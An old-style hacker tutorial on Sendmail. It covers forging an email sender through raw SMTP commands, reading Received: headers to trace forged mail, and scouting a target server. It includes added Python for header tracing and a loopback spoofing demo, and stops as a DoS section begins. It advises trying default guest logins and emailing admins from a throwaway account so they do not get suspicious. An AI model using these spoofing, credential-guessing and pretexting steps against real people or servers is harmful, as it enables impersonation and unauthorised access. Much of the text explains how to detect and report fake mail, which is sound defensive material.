Author: Raven
Contents
========

Sendmail? Huh?
  * What is Sendmail?
  * What is it used for?
  * Why would I want to learn about Sendmail?

How do I create authentically-looking fake mails?
  * You mean I can send Emails from bgates@microsoft.com or bclinton@whitehouse.org?!
  * Is it possible to create a 100% authentic Email?
  * How can I learn raw Sendmail commands by myself?
  * But what if I'm lazy? Can you pleeease teach me?
  * How do I track down carelessly-made fake mails?
  * How do I track down more sophisticated fake mails?
  * Can I get caught?
  * Will I get caught?

Hack the server? Through Sendmail?!
  * Can I really hack a host that runs Sendmail?
  * So why is Sendmail called "the buggiest daemon on Earth" anyway?
  * Okay, great. Now how do I do it?
  * Can you tell me more about various Sendmail security holes?
  * Where can I find more Sendmail security holes?
  * How can I tell what version of Sendmail the target host is running?
  * Why should I care anyway?
  * How can I use the BugTraq archives to find the holes I'm looking for?
  * Can I get caught?
  * Will I get caught?
  * Final Notes

Okay, so I can hack a host which runs Sendmail. How do I do it?
  * A Local DoS(29) in All Sendmail Versions Up to 8.9.3
  * Bug in Sendmail's HELO command
  * Giant Bug in Sendmail 8.8.4
  * Final Notes

Newbies corner
  * What is a daemon?
  * What is a port?
  * What is a service?
  * What is a daemon banner?
  * What is a timeout (in computer terms)?
  * What is TCP and how does it work?
  * What is UDP and how does it work?
  * What is ICMP and how does it work?
  * What is an IP address?
  * What is a hostname?
  * How to find out what your ISP's mail servers are?
  * What is a portscanner?
  * What is a services scanner?
  * What/who is root?
  * What is bandwidth?
  * What is a client program?
  * What is a DNS server?
  * What is Telnet (the Telnet daemon and the Telnet program)?
  * What is a command interpreter?
  * What is a shell account?
  * Who is a sysadmin?
  * What is hyper text?
  * What is an RFC?
  * What is InterNIC?
  * What is a sub domain (and how much does a domain really cost?)?
  * What is SSH?
  * What is a moderated mailing list / message board?
  * What is a DoS attack?
  * What is DUN?
  * What is a dial-up account?
  * What is a Unix password file?
  * What is a thread?

Appendix A: Fake Daemons
  * Fake Sendmail daemon
  * Fake Telnet daemon

Appendix B: Routing Mail
  * How can I route my mail?
  * How would that help me?

Appendix C: Faking the sender's IP
  * How can I fake my IP on the Email's header?
  * Where can I read more about this kind of stuff?

Appendix D: Reply-to
  * What does the Reply-to option do?
  * How do I use it?

Appendix E: CC and BCC
  * What do these commands do?
  * How do I use them?
Sendmail? Huh?
==============

Sendmail is a daemon(1) which waits for connections on port(2) 25. It is a mail transfer agent: it accepts mail from clients and from other mail servers and delivers it or relays it onward, so from the user's point of view it is "the server you send outgoing mail through". For example, your Email provider (probably your ISP (Internet Service Provider)) probably uses two servers (unless it's a web-based mail account such as Hotmail.com):

1) mail.boring-ISP.net (probably port 110, the POP3 service): for fetching your incoming mail.
2) mailgw.boring-ISP.net (port 25, SMTP): for outgoing mail.

Most of the time mail servers look pretty much like this, but the addresses vary from ISP to ISP. Mail.boring-ISP.net requires a username and a password so people won't be able to read your Emails, so let's skip this one (I might discuss cracking those passwords in another tutorial, but remember - I'm teaching you these things so you'll be able to know how malicious crackers work and not fall for their tricks, not for you to break the law and harm others). Now, as surprising as it may sound, mailgw.boring-ISP.net will often not require a password or any other means of identification. If you telnet(19) into mailgw.boring-ISP.net on port 25 and type in the right commands you will be able to send fake mails. Interesting, huh? Note that even a server which does demand a login (SMTP AUTH) or which only relays for its own customers still takes whatever sender address you type: SMTP itself never checks that the sender you give matches who you are, which is why the header-reading skills in the next chapter matter. Now, the coolest part is that you can actually hack a server running Sendmail, or at least bring it down, since Sendmail has a long history of bugs and security holes.
How can I create authentically-looking fake mails?
==================================================

As mentioned in the previous chapter, sending mail does not require you to have an account on the machine you're sending the mail from (the mail server, not your computer). All you need to know is the IP Address(9) / Hostname(10) of the mail server and the Sendmail commands. From here on we assume that you know the IP/hostname of your target. If you still don't know this important detail, please find out(11).
Now, let's get on with it. This time, unlike previous tutorials, I will "learn" all over again how to do everything I describe here and walk you through the entire process of learning and using what you have learnt. Alright, let's begin.

Our target outgoing mail server for today is mailgw.someone.com on port 25. First, let's telnet into that port by either typing 'telnet mailgw.someone.com 25' (without the quotes) on a standard Unix text-based system, running C:\Windows\telnet.exe or your favorite telnet application and typing mailgw.someone.com in the host field and 25 in the port field, or executing your favorite telnet application from X Windows (a graphical interface for Unix. If you're smart enough to be running some version of Unix you shouldn't have a hard time finding one. If you don't like the default telnet programs you could always go to www.linuxberg.com and grab one) and typing in the correct details (host and port).

Note about VT: you might be asked to choose a terminal type during the connection process. Something with VT and some number in it... hmm... The VT numbers are the DEC Video Terminal models (VT52, VT100, VT220 and so on) that most terminal programs imitate. Since there are several types of terminals (all sorts of monitors, old printer terminals etc') you are asked to choose the type your software should behave like (compatibility issues). VT100 should suit most people just fine.

Note about shell accounts(21): if you're not running Unix and you wish to use Unix tools on Unix systems while you work, telnet to nether.net on port 23, login as newuser and get yourself a free shell account. If you'd rather use Windows tools (I use Windows stuff when I work from Windows, except certain conditions when I really NEED Unix and I don't want to reboot and boot it up. In that case, I get myself a shell account so I am able to use Unix stuff while working from Windows) go ahead (things will work faster since the tools are actually located on your machine, not on some distant computer which runs a shell account), but I still recommend that you get a shell account at nether.net (in fact they teach you a lot of great Unix-newbies stuff when you sign up).

Note about telnetting from Macintosh: Macintosh does not come with a Telnet program. However, you can download one from: http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/ (thanks to little_v for this one!).
Now, let's see what we get after we telnet(19) to mailgw.someone.com:25 (in this case, the character : stands for 'on port', so mailgw.someone.com:25 means mailgw.someone.com on port 25).

220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)

AHA! This is... this is... ugh... WHAT THE HELL IS THIS THING?! This, my friends, is a daemon banner(4), and it just gave us tons of valuable pieces of information! Normally, this info is intended for a client program(16) to determine what version of Sendmail the target is running and how to communicate with it (a client can tell from it, for example, whether the server understands the ESMTP extensions before trying to use them). This daemon banner thing is also great for hackers and crackers, since we can determine what version our target is running. Later, when we discuss how to actually hack the server, this data will be EXTREMELY valuable.

Okay, let's analyze what we've got... 220... we don't know what this is right now... alpha.someone.com... this is the name the server calls itself, and notice that it is not the name we connected to (mailgw.someone.com is probably just another name or address for the same machine)... ESMTP... hmm... SMTP stands for Simple Mail Transfer Protocol. It is the protocol(18) used by email clients and by other mail servers to talk to Sendmail daemons, and this is what we're trying to learn right now. ESMTP is Extended SMTP. It's the same as SMTP, only it contains some more commands. Let's leave this alone for the time being. Sendmail 8.9.3/8.8.6 - AHA! There's something interesting. We got the version of the Sendmail daemon (the number before the slash is the version of the program, the one after it is the version of its configuration file)! Remember this, it will help us during the next chapter (hacking into servers which run Sendmail). The rest is the server's idea of the current date and time, which will come in handy when we read headers later.

Okay, so let's move on... umm... how do I communicate with this thing? Er... let's try typing 'help' (without the quotes). Oh, by the way, it is normal not to see what you type when you talk to Sendmail since it won't send back your keystrokes. You have to turn on "local echo" in your telnet program in order to see what you type.
214-This is Sendmail version 8.9.3
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
Wee! This is cool!! By this time you should have guessed that this number (the 220 in the daemon banner and the 214 here) is actually a reply code: every line the server sends starts with a three-digit number that tells a program (or you) how to read it. The first digit is the important one: 2xx means the command succeeded, 3xx means the server wants more input from you, 4xx means it failed for now and you may try again later, 5xx means it failed for good. 220 is the greeting, 214 is help text. When a reply spans several lines, every line but the last has a '-' right after the number (214-) and the last one has a space (214 ), which is how a program knows when to stop reading. Okay, let's move on. Let's try typing 'help helo'.
214-HELO
214-    Introduce yourself
214 End of HELP info

See? I told you so. 214 is the reply code for help messages. Okay, so that way you can practically teach yourself what every Sendmail command does. Stop right now, read all the help pages and then continue. It is important that you learn how to learn things by yourself. You might see some notes concerning the word RFC(24) and some numbers. RFCs are the documents that define the protocol; the ones that matter here are RFC 821 (SMTP itself) and RFC 822 (the format of a message and its headers), and you can find all of them at the RFC Editor, http://www.rfc-editor.org (they are mirrored in many other places too).

Note about ESMTP: remember that ESMTP thing we came across? You'll be able to get a good clue on what ESMTP is by reading the help pages (EHLO, ETRN and DSN are the extended ones; EHLO is what a client sends instead of HELO when it wants to ask the server which extensions it supports). Yes, I am trying to force you to read them... so please do. They contain tons of great information for newbies as well as pros.
Okay, I'm assuming you've finished reading all those help pages. Now let's move on. First we need to enter a sender. We do this by typing 'MAIL FROM: <fake Email address>' (remove the quotes and replace fake Email address with the fake Email address of your choice, say... bgates@microsoft.com (but leave the < and the >)).

The mail server should reply with this message:

250 bgates@microsoft.com... Sender ok

Next we type 'RCPT TO: <recipient>'. Replace recipient with the target, say victim@victim.com. We should get

250 victim@victim.com... Recipient ok

You can add recipients by simply doing this command several times, only with different recipients.

Now, let's move on to the actual message body. Type 'data' to start writing the body of the message.

354 Enter mail, end with "." on a line by itself

Now let's type in some stuff...

Subject: fake message
(note about this line: in this line you get to determine what subject you want to give your message. Everything you type before the first empty line is treated as a header, so leave one blank line after the Subject: line, or the first line of your text will end up among the headers.)

Hello. This is a fake Email message. I'm bored. Gimme something to hack!!
.

The dot on a line by itself ends the message, just as the 354 line told us. Now we get this:

250 CAA15313 Message accepted for delivery

You must be wondering right now what the heck is that number after the 250. This is the queue ID: the name Sendmail gives the message while it sits in its queue, and the key under which every step of its delivery is written to the server's log. It's just a number to us, but we'll use it later... don't you worry your pretty head about this. Now, if you were the recipient you would have got a 100% reliable-looking fake mail. OR IS IT?
Let's take a look at what the recipient would get... Hmm... welp, looks like an ordinary message to me. At least it does to the ordinary user. Now let's look at the headers. Headers are a couple of lines which come with every Email message. Most of today's Email clients show only the simpler parts of the header (sender, subject, date and time etc'), but right now we need the full header. On Netscape Messenger displaying the full headers is done by going to View ==> Headers ==> All. On Eudora this is done by clicking on the button which displays the "blah blah blah" caption when you put your mouse cursor above it for a second or two. Compuserve automatically displays the full header. On Outlook, right click the message in your inbox, choose Properties and choose Details. On pine, you should have an option somewhere in the configuration screens that lets you choose what kind of header you want to view (full or brief). Now let's take a look at the full header, shall we?

Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
    by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970
    for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300 (IDT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225])
    by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313
    for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO protocol
Subject: Fake mail
Status:
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff

Yeehaw!
Look at all those numbers and letters and shiny things! Let's start from the top, shall we?

Received: from alpha.someone.com (alpha.someone.com [194.90.1.13]) by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970 for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300 (IDT)

Okay, so the mail was received from alpha.someone.com (alpha.someone.com [194.90.1.13]). What does that mean? Every server that handles the message adds its own Received: line at the top, so the top line is the last hop (the recipient's own server, cmx.someone.com) and the lines below it take you back, hop by hop, towards the sender. A quick checkup on InterNIC(25)'s databases (type 'whois someone.com' without the quotes on a Unix system or download SamSpade for Windows at www.samspade.org) reveals who owns someone.com. alpha is probably some kind of a sub-server they use to send mail. Let's leave it alone, it's not important to us right now. The (alpha.someone.com [194.90.1.13]) part shows you the hostname(10) and the IP address (9) of the machine that connected to cmx to hand over the Email, as cmx saw them (the address comes from the connection itself and the name from a reverse DNS lookup of it, so they are much harder to fake than anything the sender typed). Ooh, ooh, wait! Wasn't the mail supposed to be sent from microsoft.com? I mean, the sender is bgates@microsoft.com! If we had done the mail forging thing on microsoft.com's own server instead of on someone.com this wouldn't have happened, now would it? It would have seemed like an ordinary Email... from Bill Gates... well, at least so far. Anyway, the rest is the queue ID the receiving server gave the message (which we will get to later), who it was for, and the date and time according to the clock of the server which wrote the line. The +0300 (IDT) part is that clock's offset from Greenwich time: three hours ahead. +0000 (GMT) would mean Greenwich time itself, and -0500 would mean five hours behind it. Find out your own time zone first so you'll be able to convert and find out when the message was sent in your time. Now, on to more important things.
From: bgates@microsoft.com

Well, I guess this line is obvious... it is simply what we typed after MAIL FROM, turned into a From: header by the server because we didn't supply one of our own. Anybody can type anything there. Let's move on.
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)

Okay, now this is really interesting. This is the bottom Received: line, written by the first server the message touched, and it gives us the sender's hostname and IP address. Note about the hostname: a dial-up(31) user will have a long and twisted hostname. For example: my hostname right now (at least when I was writing these lines) is RAS4-p97.hfa.netvision.net.il. Netvision.net.il is my ISP, and the rest is mostly crap (pay close attention to the hfa thing. Hfa stands for Haifa, which is my home town. It means that I'm connected through Netvision's Haifa server. See? Hostnames can be interesting). You must have noticed by now that the hostname we got is certainly not from microsoft.com, and that the mail server which sent this isn't exactly microsoft.com or a microsoft sub-domain(26) either, which clearly shows that this Email is completely fake.

Another note about the hostname: sometimes you might not get a hostname, but you will always get an IP address. You can find the IP's hostname (most IP addresses do have a hostname) by doing 'nslookup ip-address' without the quotes on a Unix system or going to http://www.samspade.org and using their DNS(17) Lookup Tool. If you still can't get it, try doing a whois on the address.

There is no trick that fixes this from the outside. The server writes down the address it actually accepted the connection from, before you have typed a single command, so to make the headers say Microsoft you would need both things at once: 1) send the mail through Microsoft's own Sendmail server, and 2) send it from an account that is connected to the net through Microsoft, so that the connecting address is theirs as well. If you can't get that, it will clearly show in the headers that the mail wasn't sent from Microsoft.
Note: nice trick to pull on someone: if your ISP is blah.com, you can send your friends an Email from admin@blah.com which will look 100% authentic to anyone who reads only the From: line. Anyone who reads the full header will still see that it came in from a dial-up hostname at blah.com rather than from the admin's machine, so it is a joke, not a disguise.
Anyway, the next few characters give us the queue ID again, as well as other pieces of info. I promised we'd get to it, didn't I? If you think someone is trying to trick you into thinking he's somebody else, send an Email to abuse@your.ISP.com or abuse@the.ISP.where.the.message.came.from.com (that is the sender's ISP from the bottom Received: line, not Microsoft: the From: line is the forged part) or abuse@the.server.that.logged.the.queue.ID.com. To know which server that is, we'll need to skip a few lines (two lines actually - time and date) and get straight to this:

Message-ID: <199907092355.CAA15313@alpha.someone.com>

Aha! Look at these interesting numbers! Our message had no Message-ID of its own (we never typed one), so alpha.someone.com made one up from the date and time (199907092355 is 1999-07-09 23:55 in Greenwich time, which is 02:55 +0300 in the Received: line), its queue ID for the message and its own name. And check this out: CAA15313@alpha.someone.com! This means that alpha.someone.com is the server which handled queue entry CAA15313, and its mail log has a line for every step of that delivery, including the address it came from. Let's send an Email to abuse@someone.com (abuse@ at the organisation's domain is the conventional address; alpha.someone.com itself is just one of their machines) and tell them that we think we received a fake mail, and include the entire header. Next thing we'll do the same with the ISP of the sender (in our case, the sender is some.hostname.crap.com [62.0.146.225], meaning his ISP is probably crap.com).
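The tracing done by hand above, as an added example that is not part of the original tutorial: a small parser that unfolds a full header, walks the Received: lines from the bottom up, pulls out the entry point's name, address and queue ID, guesses the abuse@ addresses the way the text does, and lists what looks wrong. SAMPLE is this page's header re-typed; CROPPED is a header I constructed to look like the truncated one the HELO bug in the later chapter produces; the last-two-labels rule for the abuse@ domain is a heuristic of mine and is wrong for names like netvision.net.il.

```python
import re

# Added example, not code from the original tutorial: pull the hop list out of a mail's
# full header and point at the machine that injected the message, the way the chapter does
# by hand.  SAMPLE is the page's own header, re-typed; CROPPED is a constructed header of
# the kind the HELO bug described later in the tutorial produces.  Domain guesses are heuristic.

SAMPLE = """\
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
    by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970
    for <victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300 (IDT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com [62.0.146.225])
    by alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313
    for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355.CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO protocol
Subject: Fake mail
"""
CROPPED = "Received: from " + "x" * 60 + "\nDate: Mon, 5 Jan 1998 22:08:52 +0100\nFrom: spam@flooders.net\n"

RECEIVED = re.compile(
    r"^Received:\s*from\s+(?P<claimed>\S+)"   # what the client said in HELO (or its name, if it said nothing)
    r"(?:\s+\((?P<real>[^)]*)\))?"            # what the server itself resolved: name [ip]
    r"(?:\s+by\s+(?P<by>\S+))?"               # the server that wrote the line
    r"(?:.*?\bid\s+(?P<id>[^\s;]+))?", re.I)  # its queue id for the message
IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(raw):
    """Join folded header lines: a line that starts with whitespace continues the field above it."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:
            fields[-1] += " " + line.strip()
        elif line.strip():
            fields.append(line)
    return fields


def org_domain(host):
    """Heuristic: the last two labels of a host name, for the conventional abuse@ address."""
    return ".".join(host.lower().strip("[]").split(".")[-2:])


def trace(raw):
    """Return where the mail entered the mail system and what looks wrong about it."""
    fields = unfold(raw)
    hops = []
    for field in fields:
        m = RECEIVED.match(field)
        if m:
            ip = IPV4.search(m.group("real") or "")
            hops.append(dict(m.groupdict(), ip=ip.group(1) if ip else None))
    # Every server prepends its own Received: line, so the bottom-most one is the entry point.
    origin = hops[-1] if hops else dict.fromkeys(("claimed", "real", "by", "id", "ip"))
    from_field = next((f for f in fields if f.lower().startswith("from:")), "")
    sender_domain = from_field.rpartition("@")[2].strip(" <>").lower()
    findings, contacts = [], []
    if origin["ip"] is None:
        findings.append("entry hop carries no [ip]: header cropped (overlong HELO?); only the relay's syslog can tell")
    elif origin["by"]:
        contacts.append("abuse@" + org_domain(origin["by"]))  # the relay keeps the queue id in its log
        if origin["real"] and not origin["real"].startswith("["):
            contacts.append("abuse@" + org_domain(origin["real"].split()[0]))  # the sender's ISP
    injected_by = ((origin["real"] or "") + " " + (origin["claimed"] or "")).lower()
    if sender_domain and sender_domain not in injected_by:
        findings.append("From: claims %s but the mail was injected by %s" % (sender_domain, injected_by.strip()))
    findings += [f for f in fields if f.lower().startswith("x-authentication-warning:")]
    return {"origin_ip": origin["ip"], "origin_host": origin["real"], "relay": origin["by"],
            "queue_id": origin["id"], "contacts": contacts, "findings": findings}


if __name__ == "__main__":
    for name, header in (("page sample", SAMPLE), ("cropped HELO", CROPPED)):
        print(name, trace(header), sep="\n")
```

On the page's header this reports 62.0.146.225 at some.hostname.crap.com as the entry point, queue ID CAA15313 logged at alpha.someone.com, and two findings: the From: domain does not match the injecting host, and the server itself flagged the missing HELO. On the cropped header it can only say that the address is gone and that the relay's own log is the next step.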
Now, on to the next line:

X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use HELO protocol

Damn! I knew we forgot something! Now let's do it all over again, but this time we'll type HELO microsoft.com at the beginning.

HELO microsoft.com

We get this:

250 alpha.someone.com Hello some.hostname.crap.com [62.0.146.225], pleased to meet you

The rest is exactly like last time (sender, rcpt to, etc' etc'). Now let's see what victim@victim.com would have gotten.

Aha! No X-Authentication-Warning! Look closely at that 250 reply, though: the server told us the name and address it resolved for us, and that is what still goes into the Received: line. HELO only supplied the name in front of it, so the header will now read "from microsoft.com (some.hostname.crap.com [62.0.146.225])", which is, if anything, more suspicious than before. A server built with PICKY_HELO_CHECK (see the HELO section later on) adds a warning saying that the host "claimed to be" microsoft.com as well.
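The whole exchange from this chapter, written out as a script so you can watch both sides of it. This is an added example and not code from the tutorial: a throw-away daemon that answers the way the Sendmail 8.9.3 transcript above does (the "fake Sendmail daemon" of Appendix A, in miniature) listens on a loopback port, and a raw client types HELO, HELP, MAIL FROM, RCPT TO and DATA at it and collects the reply codes. The banner, host names and queue ID CAA15313 are copied from the page; the function names, the port and the exact wording of the generated Received: and X-Authentication-Warning: headers are my own assumptions, modelled on the headers shown above.

```python
import socket
import threading

# Added example, not code from the original tutorial: a throw-away Sendmail-lookalike
# daemon plus a raw SMTP client, so the HELO/MAIL/RCPT/DATA dialogue from this chapter
# runs offline.  Banner, host names and queue id come from the page's transcript; the
# Received:/X-Authentication-Warning: wording is modelled on it, not quoted.

BANNER = "220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)"
QUEUE_ID = "CAA15313"


def fake_sendmail(listener, seen):
    """Serve one client; leave in `seen` the headers a real server would stamp on the mail."""
    conn, (peer_ip, _) = listener.accept()
    rfile = conn.makefile("rb")
    reply = lambda text: conn.sendall((text + "\r\n").encode("latin-1"))
    helo, sender, rcpts = None, None, []
    reply(BANNER)
    for raw in rfile:
        line = raw.decode("latin-1").rstrip("\r\n")
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            helo = arg.strip()
            reply("250 alpha.someone.com Hello [%s], pleased to meet you" % peer_ip)
        elif verb == "HELP":  # a multi-line reply: '214-' on every line but the last
            reply("214-This is Sendmail version 8.9.3")
            reply("214 End of HELP info")
        elif verb == "MAIL":
            sender = arg.partition(":")[2].strip()
            reply("250 %s... Sender ok" % sender.strip("<>"))
        elif verb == "RCPT" and sender:
            rcpts.append(arg.partition(":")[2].strip())
            reply("250 %s... Recipient ok" % rcpts[-1].strip("<>"))
        elif verb == "DATA" and rcpts:
            reply('354 Enter mail, end with "." on a line by itself')
            for raw in rfile:  # swallow the body up to the lone '.'
                if raw.rstrip(b"\r\n") == b".":
                    break
            # The connection's real address is stamped in whatever HELO said; HELO only supplies
            # the name in front of it, and leaving HELO out earns the warning header.
            seen["received"] = "Received: from %s ([%s]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id %s for %s" % (
                helo or "[%s]" % peer_ip, peer_ip, QUEUE_ID, rcpts[0])
            seen["warning"] = None if helo else (
                "X-Authentication-Warning: alpha.someone.com: [%s] didn't use HELO protocol" % peer_ip)
            reply("250 %s Message accepted for delivery" % QUEUE_ID)
        elif verb == "QUIT":
            reply("221 alpha.someone.com closing connection")
            break
        else:  # unknown verb, or RCPT/DATA before MAIL/RCPT
            reply("503 Bad sequence of commands" if verb in ("RCPT", "DATA") else "500 Command unrecognized")
    conn.close()


def read_reply(rfile):
    """Read one reply and return its code; '-' right after the 3 digits means more lines follow."""
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("latin-1").rstrip("\r\n")
        if len(line) < 4 or line[3] != "-":
            return int(line[:3])


def send_forged_mail(host, port, helo, mail_from, rcpt_to, body_lines):
    """Type the chapter's commands at the server; return [(command, reply code), ...]."""
    sock = socket.create_connection((host, port))
    rfile = sock.makefile("rb")
    log = [("banner", read_reply(rfile))]

    def command(text):
        sock.sendall((text + "\r\n").encode("latin-1"))
        log.append((text.split(" ", 1)[0], read_reply(rfile)))
        return log[-1][1]

    if helo:  # leaving HELO out is what produced the X-Authentication-Warning on the page
        command("HELO " + helo)
    command("HELP")
    command("MAIL FROM: <%s>" % mail_from)
    command("RCPT TO: <%s>" % rcpt_to)
    if command("DATA") == 354:
        for text in body_lines:  # dot-stuffing: a body line that starts with '.' gets a second one
            sock.sendall((("." if text.startswith(".") else "") + text + "\r\n").encode("latin-1"))
        command(".")
    command("QUIT")
    sock.close()
    return log


def run_demo(helo):
    """Run the fake daemon on a loopback port, push one forged mail through it, return both sides."""
    listener = socket.create_server(("127.0.0.1", 0))
    seen = {}
    server = threading.Thread(target=fake_sendmail, args=(listener, seen))
    server.start()
    log = send_forged_mail("127.0.0.1", listener.getsockname()[1], helo, "bgates@microsoft.com",
                           "victim@victim.com", ["Subject: fake message", "", "Hello. This is a fake Email message."])
    server.join()
    listener.close()
    return log, seen


if __name__ == "__main__":
    for claimed in (None, "microsoft.com"):
        print(*run_demo(claimed), sep="\n")
```

Run it twice, once without HELO and once with HELO microsoft.com: the warning header disappears the second time, but the Received: line the daemon builds still carries 127.0.0.1, because that address comes from the connection and not from anything the client typed. It needs Python 3.8 or later for socket.create_server.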
Final notes
-----------

I hope you enjoyed this chapter. Now you've learnt how to play harmless and legal tricks on your friends, how to spot fake mails and how easy it is to catch you if you're trying to do illegal stuff. Oh, and by the way, there is a way to hide your IP/hostname when faking mail... for more information, read the second section in the 'Okay, so I can hack a host which runs Sendmail. How do I do it?' chapter.
Hack the server? Through Sendmail?!
===================================

Yeah, sure, why not? I mean, EVERY service(3) is vulnerable to some attacks. That's why it is recommended to run as few services as possible on your computer. But the most vulnerable one is Sendmail (this is why it is called 'the buggiest daemon on Earth' or 'the buggiest daemon on the planet': it is a large, old program which runs as root(14) and talks to the whole Internet, so every bug in it counts). A member of the mailing list once told me that he just can't wait to read the Sendmail Tutorial (this was before this tutorial was released) and that he himself runs Sendmail on his computer. Running Sendmail on a personal computer is unnecessary and dangerous. If your computer does not act as a mail server, there is no reason for you to run Sendmail (unless you want people to be able to send mail to your-account@your.IP.address instead of your-account@your.ISP.com. Note about your-account: in the first address, your-account is the name of your username on your own computer (Unix users should know what I am talking about). In the second address, your-account is your username at your ISP). Note: the information in this chapter can be either used to hack servers, or the other way around - to protect your server. Please don't break the law, or at least don't spew out my name during the investigations... hehe...
Okay, so the first thing we have to do in order to hack a server through a specific service (or to improve the security of a specific server) is to find out its (the service's) version. This can be easily done by viewing the daemon banner(4). Suppose we came across a computer that runs Sendmail 8.8.3 (which was quite old when this tutorial was written, meaning there should be a couple of bugs here. Sendmail is upgraded mostly when a new bug is found. In fact, everything except the daemon's security is rarely changed during upgrades). Next we'll try to determine the OS (Operating System) which this daemon runs on. If Sendmail's banner won't tell us, the Telnet(19) daemon might. First telnet to port 23 and cross your fingers. If there's a daemon on that port, it's probably the Telnet daemon, and it'll probably give you the name and version of the OS. If not, you can either:

1) Try looking for a guest account (username: guest, password: guest or username: newuser, password: newuser), since some systems give you these details only after you log in.
2) Email admin@your-target.com and ask him (I recommend opening a mailbox on one of those free mailbox services such as Hotmail and Emailing him from there, since some admins(22) might get a little suspicious...).
3) Try going to your target's website. This kind of information might be there, somewhere.

If you still didn't find the OS, fear not! We might still be able to do a cool hack without this information, but still this information might come in handy, so do all you can to get your hands on it.
Next thing, you browse some online databases until you find the
hole you've been looking for. First of all I'll explain about the largest
and most recommended online databases, and then I'll teach you how to
search them, plus some valuable concepts and words you need to get
familiar with.
Packet Storm Security
+++++++++++++++++++++

URL: http://packetstorm.securify.com. One of the largest online databases for security-related information. I recommend going there once a day and reading the 'New Files Today' section, whether you're looking for specific holes or not. The archive was founded by Ken Williams and gets hundreds of thousands of hits per week. It has recently been transferred into the ownership of Kroll-O'Gara (www.securify.com).
Security Focus
++++++++++++++

URL: http://www.securityfocus.com. Another comprehensive database. Updated daily. These guys never sleep!
BugTraq
+++++++

URL: hosted by Security Focus (http://www.securityfocus.com), previously hosted by Netspace (http://www.netspace.org). BugTraq is one of the best security mailing lists out there. The list is moderated, meaning that if you find a new security hole, you can only send your message to the moderator, Aleph1 (aleph1@underground.org). Aleph1 filters out all the spam, lame messages and old bugs and posts only the good ones to the list. I recommend signing up at http://www.securityfocus.com. You can also search their archive, which is by the way my favorite security-related database, by going to securityfocus.com and looking for a link called 'search'.
Searching
*********

If we are looking for a bug in Sendmail 8.8.3, we'll need to type the following search keywords: 'sendmail 8.8.3' (without the quotes). If we're looking for something specific, such as a local DoS(29) attack against any version of sendmail, we will use the following search keywords: 'local DoS sendmail', etc'.
Searching Packet Storm
++++++++++++++++++++++

Packet Storm should have a search box somewhere (Ken changes the layout every now and then so I can't give you the exact location of the box). You can divide the search results you will get into two categories: texts and programs. For example: you searched for a specific hole and you got a couple of text files and a couple of programs. The text files explain the bugs and how to exploit them, while the programs use the hole to get in. These programs are often called 'exploits' and usually come as source code instead of as a binary file. Let me explain: a binary file is any file that isn't made of text. Executable files are usually binary files. Now, in our case, programs come as sources instead of binaries. Sources are in the form of plain text, and they're actually a bunch of commands. When given to a compiler, this source code turns into an executable binary (except for source code written in the Perl programming language, which can be executed in the form of source if you have the right program, the Perl interpreter). Anyway, these programs come in the form of sources so you will be able to understand how they work instead of blindly running them. Do read them before you run them: an 'exploit' pulled from an archive is untrusted code, and some of them do something quite different from what their description says.
Searching Security Focus
++++++++++++++++++++++++

Security Focus offers more organized information. Instead of various bits of information, Security Focus offers articles. These include exact definitions of the bug, where and when it should happen, work-arounds (how to solve it) etc'. The only drawback of Security Focus is that it is smaller than other databases.
BugTraq
+++++++

Ah... my favorite database. When people post something to BugTraq about a security hole they found, other people can reply to them and share their side of the story. For example: did it work on their computer too, how to fix the bug in various ways, what causes the bug in the first place etc'. You can compile a full database with all of the necessary information by simply reading a couple of posts.
Getting Caught
**************

If you're planning on doing something bad, please don't. You can get caught. Better crackers than you already got caught. Don't be stupid.

Okay, so I can hack a host which runs Sendmail. Now how do I do it?
===================================================================

I have made a nice list with several security holes regarding Sendmail just to give you the hang of it.
A Local DoS(29) in All Sendmail Versions Up to 8.9.3 (taken from Packet Storm)
****************************************************

Date: Sat, 3 Apr 1999 00:42:56 +0200
